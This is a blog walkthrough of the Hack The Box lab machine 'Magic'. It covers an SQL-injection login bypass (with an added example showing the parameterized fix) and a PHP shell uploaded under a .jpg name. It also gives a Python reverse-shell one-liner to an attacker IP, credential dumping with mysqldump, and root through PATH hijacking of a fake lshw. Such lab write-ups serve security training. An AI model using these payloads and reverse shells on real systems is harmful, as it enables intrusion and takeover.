SecWalk.com

HTB Walkthrough Magic 10.10.10.185

Enumeration

Nmap Scan

nmap -sV -sC  10.10.10.185

Web page

After this I ran gobuster, in order to enumerate the web page for files and directories.

gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

We see some interesting pages:

                upload.php

                login.php

The login page.

Bypassing Login Page

We can bypass this login page by SQL injection.

Resource: https://portswigger.net/support/using-sql-injection-to-bypass-authentication

Username: ' or ''='

Password: ' or ''='

After we have logged into the website, we see an upload page where we can upload an image.
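To show why the quotes above let us in, and what the fix on the server side looks like, here is an added example (not code from the box or from this post) that uses an in-memory SQLite table as a stand-in for the site's login query; the table name, columns and stored credential are constructed assumptions.

```python
import sqlite3

# Constructed stand-in for the site's login table (assumed schema, not the real one).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'hypothetical-pass')")
    return conn

def login_vulnerable(conn, username, password):
    # The query is built by string concatenation, so the quote characters in the
    # input become part of the SQL. With ' or ''=' in both fields the WHERE clause
    # reads: username = '' or ''='' AND password = '' or ''=''
    # AND binds tighter than OR, so the trailing ''='' makes the whole clause true.
    query = ("SELECT username FROM login WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_parameterized(conn, username, password):
    # Placeholders hand the values to the driver separately from the SQL text,
    # so quotes in the input are compared literally and never change the query.
    query = "SELECT username FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

# The exact payload used on the login page above.
PAYLOAD = "' or ''='"

def demo():
    """Returns (bypass works on vulnerable, bypass works on parameterized)."""
    conn = make_db()
    return (login_vulnerable(conn, PAYLOAD, PAYLOAD),
            login_parameterized(conn, PAYLOAD, PAYLOAD))

if __name__ == "__main__":
    print(demo())  # (True, False)
```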

Exploitation

I tried a simple upload bypass: adding .jpg at the end of the filename.

When I try to upload the image, I get the following banner.

After trying some things, I found the following resource:

https://github.com/jgor/php-jpeg-shell/blob/master/shell.php

I download it to my system.

If we can upload this, then we have an LFI.

First, we need to add a .jpg extension at the end of the filename.

mv shell.php shell.php.jpg

We upload the image.

Uploaded it successfully.

Now we need to find where the file is uploaded.

gobuster dir -u http://10.10.10.185/images -w /home/kali/Desktop/wordlists/dirbuster/directory-list-2.3-medium.txt

The place where the file is uploaded to is /images/uploads.

http://10.10.10.185/images/uploads/shell.php.jpg

Now we have code execution.


Getting Reverse Shell

In order to get a reverse shell I used the following code.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We can't read user.txt yet; we need to find credentials for the user theseus.

I found credentials in /var/www/Magic/db.php5

The credentials are:

                Theseus: iamkingtheseus

I couldn't log in with these credentials.

Because these credentials are for a SQL database, I tried to dump the SQL database.

mysqldump -utheseus -piamkingtheseus Magic

In the dump I found new credentials:

                admin:Th3s3usW4sK1ng

I couldn't log in with admin:Th3s3usW4sK1ng, but I could log in with:

                theseus:Th3s3usW4sK1ng

whoami && ifconfig && cat user.txt; echo


Post-Exploitation

Running enumeration script: lse.sh

Kali System:

                python3 -m http.server 80

Target System:

                wget http://10.10.14.12/lse.sh

Then run the script:

bash lse.sh

We see an unusual binary.

                /bin/sysinfo

Creating a fake lshw and fdisk

What sysinfo does: it reads the hardware configuration of the system, such as memory size, CPU, etc.

Resource: https://www.exploit-db.com/exploits/44150

What we need to do is the following:

  1. Create an lshw file containing a reverse shell.
  2. Then put the directory holding that lshw file at the front of our PATH.
  3. Run the sysinfo command and we get root.

Reverse Shell inside The File

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Setting Our Path

export PATH=/tmp/IceL0rd:$PATH

Getting Root Shell

sysinfo

whoami && ifconfig && cat root.txt; echo

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
